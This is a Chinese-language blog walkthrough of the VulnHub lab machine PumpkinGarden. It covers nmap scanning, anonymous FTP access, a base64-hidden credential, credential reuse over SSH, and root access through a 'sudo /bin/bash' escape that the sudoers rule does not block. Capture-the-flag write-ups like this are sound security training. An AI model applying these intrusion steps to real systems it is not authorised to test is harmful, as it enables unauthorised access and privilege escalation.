PumpkinGarden 靶机

PumpkinGarden 靶机

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.141                                           
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 05:37 EDT
Nmap scan report for 192.168.56.141
Host is up (0.00022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
1515/tcp open  ifor-protocol
3535/tcp open  ms-la
MAC Address: 08:00:27:20:A9:84 (Oracle VirtualBox virtual NIC)

开放了21, 1515, 3535 端口

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ sudo nmap -sT -sV -sC -O -p21,1515,3535 192.168.56.141
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 05:42 EDT
Nmap scan report for 192.168.56.141
Host is up (0.00048s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              88 Jun 13  2019 note.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.56.106
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.2 - secure, fast, stable
|_End of status
1515/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Mission-Pumpkin
3535/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 d8:8d:e7:48:3a:3c:91:0e:3f:43:ea:a3:05:d8:89:e2 (DSA)
|   2048 f0:41:8f:e0:40:e3:c0:3a:1f:4d:4f:93:e6:63:24:9e (RSA)
|   256 fa:87:57:1b:a2:ba:92:76:0c:e7:85:e7:f5:3d:54:b1 (ECDSA)
|_  256 fa:e8:42:5a:88:91:b4:4b:eb:e4:c3:74:2e:23:a5:45 (ED25519)
MAC Address: 08:00:27:20:A9:84 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

FTP 允许匿名登录,1515 是 Web 服务端口,3535 是 ssh 端口,Ubuntu 操作系统

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ sudo nmap --script=vuln -p21,1515,3535 192.168.56.141 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-12 05:45 EDT
Nmap scan report for 192.168.56.141
Host is up (0.00050s latency).

PORT     STATE SERVICE
21/tcp   open  ftp
1515/tcp open  ifor-protocol
3535/tcp open  ms-la
MAC Address: 08:00:27:20:A9:84 (Oracle VirtualBox virtual NIC)

漏洞脚本扫描没结果,接下来看看 ftp 匿名登录后的文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ ftp 192.168.56.141
Connected to 192.168.56.141.
220 Welcome to Pumpkin\'s FTP service.
Name (192.168.56.141:kali): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||12463|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0              88 Jun 13  2019 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||54151|).
150 Opening BINARY mode data connection for note.txt (88 bytes).
100% |***********************************************************************|    88       42.50 KiB/s    00:00 ETA
226 Transfer complete.
88 bytes received in 00:00 (34.22 KiB/s)
ftp> pwd
Remote directory: /
ftp> ls -liah
229 Entering Extended Passive Mode (|||54091|).
150 Here comes the directory listing.
drwxr-xr-x    2 0        113          4096 Jun 11  2019 .
drwxr-xr-x    2 0        113          4096 Jun 11  2019 ..
-rw-r--r--    1 0        0              88 Jun 13  2019 note.txt
226 Directory send OK.
ftp> exit
421 Timeout.

下载到本地查看

1
2
3
4
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ cat note.txt                                        
Hello Dear! 
Looking for route map to PumpkinGarden? I think jack can help you find it.

获得了一个用户名 jack,还提到了网站路径地图?不过没有更多信息了

Web 查看

看一看 web 服务界面。

页面看起来并没有特别之处,加粗的先留存记录一下,hood 这个单词作为路径试试也是 404,看看网页源代码

提到了 img 目录,边查看 img 目录边爆破

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ sudo gobuster dir -u http://192.168.56.141:1515/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,sql,tar,php
[sudo] password for kali: 
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.141:1515/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Extensions:              txt,html,sql,tar,php
[+] Timeout:                 10s
===============================================================
2023/09/12 06:50:46 Starting gobuster in directory enumeration mode
===============================================================
/.php                 (Status: 403) [Size: 287]
/.html                (Status: 403) [Size: 288]
/index.html           (Status: 200) [Size: 903]
/img                  (Status: 301) [Size: 320] [--> http://192.168.56.141:1515/img/]
/.html                (Status: 403) [Size: 288]
/.php                 (Status: 403) [Size: 287]
/server-status        (Status: 403) [Size: 296]
Progress: 1321045 / 1323366 (99.82%)
===============================================================
2023/09/12 06:54:28 Finished
===============================================================

爆破没结果,/img 页面直接查看倒是有意外之喜

进入 hidden_secret/ 查看,有个文件,打开发现

尝试一下解码

没想到 base64 直接解码成功了

1
scarecrow : 5Qn@$y

ftp 用户登录

试着用这个口令登录 ftp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ ftp 192.168.56.141
Connected to 192.168.56.141.
220 Welcome to Pumpkin\'s FTP service.
Name (192.168.56.141:kali): scarecrow
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls
229 Entering Extended Passive Mode (|||64848|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0             167 Jun 11  2019 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
229 Entering Extended Passive Mode (|||39844|).
150 Opening BINARY mode data connection for note.txt (167 bytes).
100% |***********************************************************************|   167       77.62 KiB/s    00:00 ETA
226 Transfer complete.
167 bytes received in 00:00 (59.41 KiB/s)
ftp> exit
221 Goodbye.

查看下载的 note.txt 文件

1
2
3
4
5
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ cat note.txt                                        

Oops!!! I just forgot; keys to the garden are with LordPumpkin(ROOT user)! 
Reach out to goblin and share this "Y0n$M4sy3D1t" to secretly get keys from LordPumpkin.

猜测这里的 goblin 是用户名,这样又得到了一个口令,尝试登录ftp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ ftp 192.168.56.141
Connected to 192.168.56.141.
220 Welcome to Pumpkin\'s FTP service.
Name (192.168.56.141:kali): goblin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -liah
229 Entering Extended Passive Mode (|||26945|).
150 Here comes the directory listing.
drwx------    2 1002     1002         4096 Jun 13  2019 .
drwxr-xr-x    5 0        0            4096 Jun 11  2019 ..
-rw-------    1 1002     1002           32 Jun 11  2019 .bash_history
-rw-r--r--    1 1002     1002          231 Jun 11  2019 .bash_logout
-rw-r--r--    1 1002     1002         3637 Jun 11  2019 .bashrc
-rw-r--r--    1 1002     1002          675 Jun 11  2019 .profile
-rw-r--r--    1 0        0             328 Jun 11  2019 note
226 Directory send OK.
ftp> pwd
Remote directory: /home/goblin
ftp> get .bash_history
local: .bash_history remote: .bash_history
229 Entering Extended Passive Mode (|||20033|).
150 Opening BINARY mode data connection for .bash_history (32 bytes).
100% |***********************************************************************|    32       16.19 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (10.47 KiB/s)
ftp> cd note
550 Failed to change directory.
ftp> ls
229 Entering Extended Passive Mode (|||19069|).
150 Here comes the directory listing.
-rw-r--r--    1 0        0             328 Jun 11  2019 note
226 Directory send OK.
ftp> get note
local: note remote: note
229 Entering Extended Passive Mode (|||48158|).
150 Opening BINARY mode data connection for note (328 bytes).
100% |***********************************************************************|   328      449.87 KiB/s    00:00 ETA
226 Transfer complete.
328 bytes received in 00:00 (257.27 KiB/s)
ftp> cd /var/www/html
421 Timeout.
ftp> ls
Not connected.
ftp> exit

将下载的两个文件进行查看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ cat .bash_history 
cd
clear
sudo su
sudo namp
exit
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ cat note         

Hello Friend! I heard that you are looking for PumpkinGarden key. 
But Key to the garden will be with LordPumpkin(ROOT user), don\'t worry, I know where LordPumpkin had placed the Key.
You can reach there through my backyard.

Here is the key to my backyard
https://www.securityfocus.com/data/vulnerabilities/exploits/38362.sh

提到的链接无法访问,又去搜索了一番(先搜这个网站发现已经关闭了,再直接搜这个文件路径,发现了 CVE 编号,根据 CVE 编号再进行搜索),发现这大概率是个提权的脚本

那接下来的问题就是如何进入到系统内部,最起码要拿到 shell,这个脚本才有用(虽然找不到这个脚本了)

密码复用

尝试直接使用已经得到的两对口令来 ssh 登录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
┌──(kali㉿kali)-[~/Downloads/PumpkinGarden]
└─$ ssh goblin@192.168.56.141 -p 3535
The authenticity of host \'[192.168.56.141]:3535 ([192.168.56.141]:3535)' can't be established.
ED25519 key fingerprint is SHA256:mLTE3ZDFS+c1wgTIsHLdH7jtZFKpYoPljQRHRdH7IVo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added \'[192.168.56.141]:3535\' (ED25519) to the list of known hosts.
------------------------------------------------------------------------------
                          Welcome to Mission-Pumpkin
      All remote connections to this machine are monitored and recorded
------------------------------------------------------------------------------
goblin@192.168.56.141\'s password: 
Last login: Thu Jun 13 00:43:14 2019 from 192.168.1.106
goblin@Pumpkin:~$ whoami
goblin
goblin@Pumpkin:~$ id
uid=1002(goblin) gid=1002(goblin) groups=1002(goblin),27(sudo)
goblin@Pumpkin:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:20:a9:84 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.141/24 brd 192.168.56.255 scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::a00:27ff:fe20:a984/64 scope link 
       valid_lft forever preferred_lft forever
goblin@Pumpkin:~$ sudo -l
[sudo] password for goblin: 
Matching Defaults entries for goblin on Pumpkin:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goblin may run the following commands on Pumpkin:
    (root) ALL, !/bin/su

提权

sudo -l 给出了很有意思的结果,这个用户可以使用 sudo 执行除了 su 以外的所有命令,那就简单了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
goblin@Pumpkin:~$ sudo /bin/bash
root@Pumpkin:~# cd /root
root@Pumpkin:/root# ls
PumpkinGarden_Key
root@Pumpkin:/root# ls -alih
total 36K
131254 drwx------  3 root root 4.0K Jun 13  2019 .
     2 drwxr-xr-x 22 root root 4.0K Jun 11  2019 ..
164960 -rw-r--r--  1 root root   22 Jun 13  2019 .bash_logout
131227 -rw-r--r--  1 root root 3.1K Jun 11  2019 .bashrc
 21448 drwx------  2 root root 4.0K Jun 11  2019 .cache
142821 -rw-------  1 root root   17 Jun 13  2019 .nano_history
131226 -rw-r--r--  1 root root  140 Feb 20  2014 .profile
169390 -rw-r--r--  1 root root   25 Jun 13  2019 PumpkinGarden_Key
164957 -rw-r--r--  1 root root   66 Jun 11  2019 .selected_editor
root@Pumpkin:/root# cat PumpkinGarden_Key
Q29uZ3JhdHVsYXRpb25zIQ==
root@Pumpkin:/root# echo -n "Q29uZ3JhdHVsYXRpb25zIQ==" | base64 -d
Congratulations!root@Pumpkin:/root#

总结

这台靶机相比于作者上一台靶机来说难度降低了很多,也没有在爆破上设置考察点,甚至目录爆破都不需要,也没兔子洞,只要信息搜集能力不算差,应该都能很快拿下这台靶机。

补充:有两个口令,我运气好使用 goblin 用户就发现了 sudo -l 可以提权。而 scarecrow 用户实际上也可以 ssh 登录,只不过不具备 sudo -l 的权限

knowledge_database > vulnhub
PumpkinGarden 靶机
https://i3eg1nner.github.io/2023/09/4f14f7be4ea4.html
作者
I3eg1nner
发布于
2023年9月12日
许可协议